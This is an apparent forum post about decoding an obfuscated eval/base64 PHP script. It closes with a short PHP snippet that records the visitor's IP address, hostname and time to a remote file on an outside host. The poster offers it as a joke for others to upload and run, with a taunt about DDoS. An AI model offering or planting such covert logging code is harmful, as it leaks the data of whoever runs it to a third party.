Ok thanx for the decrypt.
but yes i changed eval(); to echo();
it decoded to the second encrypt.
i ran a reverse string change. so i got the orig base64 again.
and echo it again.
but it dint came out like that .
it came out like this------------,
V

can you explain step by step how you did it that it came out like that.
lol @ dragon.
$ip = $REMOTE_ADDR;
$host = gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$fl = fopen('http://h2oscripts.net/iplog.txt', 'a');
fwrite($fl, "$ip . $host . $date \n\n");
fclose($fl);
^^^^^^^^^^^^( this one doesnt work, so dont go flamin on me , its just a joke ).
put that in a blank php upload it run, so i can DDoS you the whole week.